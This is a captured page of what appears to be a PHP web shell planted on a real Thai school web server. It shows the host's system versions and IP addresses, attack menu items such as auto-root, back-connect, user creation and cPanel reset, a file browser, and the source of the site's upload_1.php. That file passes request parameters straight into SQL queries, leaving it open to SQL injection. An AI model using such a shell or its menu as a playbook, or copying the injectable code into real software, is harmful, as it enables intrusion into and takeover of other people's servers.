Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
amss /
modules /
questionnaire /
school /
[ HOME SHELL ]
Name
Size
Permission
Action
sch_answer_qtn.php
26.11
KB
-rw-r--r--
sch_report1.php
13.2
KB
-rw-r--r--
sync.php
3.79
KB
-rw-r--r--
sync.php.bak
3.79
KB
-rw-r--r--
upload_1.php
7.85
KB
-rw-r--r--
upload_2.php
1.46
KB
-rw-r--r--
upload_2_2.php
1.46
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : upload_1.php
<?php if(!($_REQUEST['index']==3)){ exit(); } //ส่วนยืนยันการลบข้อมูล if($index==12) { echo "<br>"; echo "<table width='500' border='0' align='center'>"; echo "<tr><td align='center'><font color='#990000' size='4'>โปรดยืนยันความต้องการลบข้อมูลอีกครั้ง</font><br></td></tr>"; echo "<tr><td align=center>"; echo "<INPUT TYPE='button' name='smb' value='ยืนยัน' onclick='location.href=\"?option=questionnaire&task=main/upload_1&index=3&id=$_GET[id]&qtn_use_id=$_GET[qtn_use_id]&qtn_qq_id=$_GET[qtn_qq_id]\"'> <INPUT TYPE='button' name='back' value='ยกเลิก' onclick='location.href=\"?option=questionnaire&task=main/upload_1&qtn_use_id=$_GET[qtn_use_id]&qtn_qq_id=$_GET[qtn_qq_id]\"'"; echo "</td></tr></table>"; } //ส่วนลบข้อมูล if($index==13){ $sql = "delete from questionnaire_upload where id=$_GET[id]"; $dbquery = mysqli_query($connect,$sql); $index=""; } //ส่วนบันทึกข้อมูล if($index==14){ $dfile1 = $_POST ['dfile1'] ; $myfile1 = $_FILES ['myfile1'] ['tmp_name'] ; $myfile1_name = $_FILES ['myfile1'] ['name'] ; $myfile1_size = $_FILES ['myfile1'] ['size'] ; $myfile1_type = $_FILES ['myfile1'] ['type'] ; $array_last1 = explode("." ,$myfile1_name) ; $c1 =count ($array_last1) - 1 ; $lastname1 = strtolower ($array_last1 [$c1] ) ; if ($myfile1<>"") { if ($lastname1 =="doc" or $lastname1 =="docx" or $lastname1 =="rar" or $lastname1 =="pdf" or $lastname1 =="xls" or $lastname1 =="xlsx" or $lastname1 =="zip" or $lastname1 =="jpg" or $lastname1 =="gif" or $lastname1 =="png" ) { $upfile1 = "" ; }else { $upfile1 = "-ไม่อนุญาตให้ทำการแนบไฟล์ $myfile1_name<BR> " ; } } if ($upfile1<> "" ) { echo "<B><FONT SIZE=2 COLOR=#990000>มีข้อผิดพลาดเกี่ยวกับไฟล์ของคุณ ดังรายละเอียด</FONT></B><BR>" ; echo "<FONT SIZE=2 COLOR=#990099>" ; echo $upfile1 ; echo "</FONT>" ; echo " <input type=\"button\" value=\" แก้ไข \" onClick=\"javascript:history.go(-1)\" ></CENTER>" ; exit () ; } if ($myfile1<>"" ) { $rec_date = date("Y-m-d"); $timestamp = mktime(date("H"), date("i"),date("s"), date("m") ,date("d"), date("Y")) ; $random=rand(); $ref_id = $random."x".$timestamp ; $myfile1name=$ref_id."_1.".$lastname1 ; copy ($myfile1, "modules/questionnaire/upload_files/".$myfile1name) ; $sql = "insert into questionnaire_upload(qtn_use_id,qtn_qq_id,message,file,officer,rec_date) values ('$_POST[qtn_use_id]','$_POST[qtn_qq_id]','$_POST[dfile1]','$myfile1name','$officer','$rec_date')"; $dbquery = mysqli_query($connect,$sql); unlink ($myfile1) ; $index=6; } } //end if index==4 if($index==""){ $sql="select * from questionnaire_upload where qtn_use_id='$_REQUEST[qtn_use_id]' and qtn_qq_id='$_REQUEST[qtn_qq_id]' "; $dbquery = mysqli_query($connect,$sql); $num_row=mysqli_num_rows($dbquery); if($num_row==0){ $index=5; } else { $index=6; } } if($index==15){ echo "<br>"; $sql="select * from questionnaire_qq where qtn_qq_id='$_GET[qtn_qq_id]' limit 0,1"; $dbquery = mysqli_query($connect,$sql); $row=mysqli_fetch_array($dbquery); echo "<form Enctype = multipart/form-data id='frm1' name='frm1'>"; echo "<Center>"; echo "<Font color='#006666' Size='3'><b>เอกสารประกอบ</b></Font>"; echo "<br><Font color='#006666' Size='2'><b>ข้อคำถาม : $row[qtn_qq_name]</b></Font>"; echo "</Cener>"; echo "<Br>"; echo "<table width='700' border='0' align='center'>"; echo "<Tr>"; echo "<td align='right'><INPUT TYPE='button' name='smb' value='<<กลับหน้าก่อน' onclick='location.href=\"?option=questionnaire&task=main/create_use_qtn_detail&index=4&qtn_use_id=$_REQUEST[qtn_use_id]\"'></td></Tr>"; echo "</table>"; echo "<table border='1' width='700' id='table1' style='border-collapse: collapse' bordercolor='#C0C0C0'>"; echo "<tr bgcolor='#003399'>"; echo "<td colspan='4' height='23' align='left'><font size='2' color='#FFFFFF'> กรุณาระบุรายละเอียด</font></td>"; echo "</tr>"; echo "<tr>"; echo "<td width='371' align='center' colspan='2'><font size='2' color='#800000'>แนบไฟล์</font></td>"; echo "<td width='238' align='center' colspan='2' align='center'><font size='2' color='#800000'>คำอธิบายไฟล์</font></td>"; echo "</tr>"; echo "<tr>"; echo "<td width='94' align='right'><font size='2' color='#0000FF'>ไฟล์แนบ </font></td>"; echo "<td width='274'> <input type='file' name='myfile1' size='26' style='background-color: #99ccff'> </td>"; echo "<td width='238' align='center' colspan='2'><input type='text' name='dfile1' size='31' style='background-color: #BBD1FF'></td>"; echo "</tr>"; echo "<tr>"; echo "<td align='center' colspan='4'><FONT SIZE='2' COLOR='#CC9900'>เฉพาะไฟล์ doc, pdf, xls, gif, jpg, zip, rar เท่านั้น</FONT></td>"; echo "</tr>"; echo "<input name='qtn_use_id' type='hidden' value='$_GET[qtn_use_id]'>"; echo "<input name='qtn_qq_id' type='hidden' value='$_GET[qtn_qq_id]'>"; echo "<tr>"; echo "<td align='center' colspan='4'><BR><INPUT TYPE='button' name='smb' id='smb' value='ตกลง' onclick='goto_url(1)'></td>"; echo "</tr>"; echo "</Table>"; echo "</form>"; } if($index==16){ $sql="select * from questionnaire_qq where qtn_qq_id='$_REQUEST[qtn_qq_id]' limit 0,1"; $dbquery = mysqli_query($connect,$sql); $row=mysqli_fetch_array($dbquery); echo "<br>"; echo "<Center>"; echo "<Font color='#006666' Size='3'><b>เอกสารประกอบ</b></Font>"; echo "<br><Font color='#006666' Size='2'><b>ข้อคำถาม : $row[qtn_qq_name]</b></Font>"; echo "</Cener>"; echo "<br><br>"; $sql="select * from questionnaire_upload where qtn_use_id='$_REQUEST[qtn_use_id]' and qtn_qq_id='$_REQUEST[qtn_qq_id]' "; $dbquery = mysqli_query($connect,$sql); echo "<table width='50%' border='0' align='center'>"; echo "<Tr><Td colspan='5' align='left'><INPUT TYPE='button' name='smb' value='เพิ่มเอกสาร' onclick='location.href=\"?option=questionnaire&task=main/upload_1&index=5&qtn_use_id=$_REQUEST[qtn_use_id]&qtn_qq_id=$_REQUEST[qtn_qq_id]\"'></Td>"; echo "<td align='right'><INPUT TYPE='button' name='smb' value='<<กลับหน้าก่อน' onclick='location.href=\"?option=questionnaire&task=main/create_use_qtn_detail&index=4&qtn_use_id=$_REQUEST[qtn_use_id]\"'></td></Tr>"; echo "</table>"; echo "<table width='50%' border='1' align=center style='border-collapse: collapse'>"; echo "<Tr bgcolor='#99ccff' align='center'><Td width='60'>ที่</Td><Td>เอกสาร</Td><Td width='40'>ลบ</Td></Tr>"; $M=1; While ($result = mysqli_fetch_array($dbquery)){ $id = $result['id']; $message = $result['message']; $file = $result['file']; $qtn_use_id=$result['qtn_use_id']; $qtn_qq_id=$result['qtn_qq_id']; if(($M%2) == 0) $color="#E5E5FF"; else $color="#FFFFFF"; echo "<Tr bgcolor='$color'><Td valign='top' align='center'>$M</Td><td><a href=modules/questionnaire/upload_files/$file target='_blank'>$message</a></td><Td valign='top' align='center'><a href=?option=questionnaire&task=main/upload_1&index=2&id=$id&qtn_use_id=$qtn_use_id&qtn_qq_id=$qtn_qq_id><img src=images/drop.png border='0' alt='ลบ'></a></td></tr>"; $M++; } echo "</Table>"; } ?> <script> function goto_url(val){ if(val==1){ var file1 = document.frm1.myfile1.value; var vdfile1 = document.frm1.dfile1.value; if(frm1.myfile1.value == ""){ alert("กรุณาเลือกไฟล์"); } else if(frm1.dfile1.value == ""){ alert("กรุณากรอกคำอธิบายไฟล์"); } else{ callfrm("?option=questionnaire&task=main/upload_1&index=4"); } } } </script>
Close
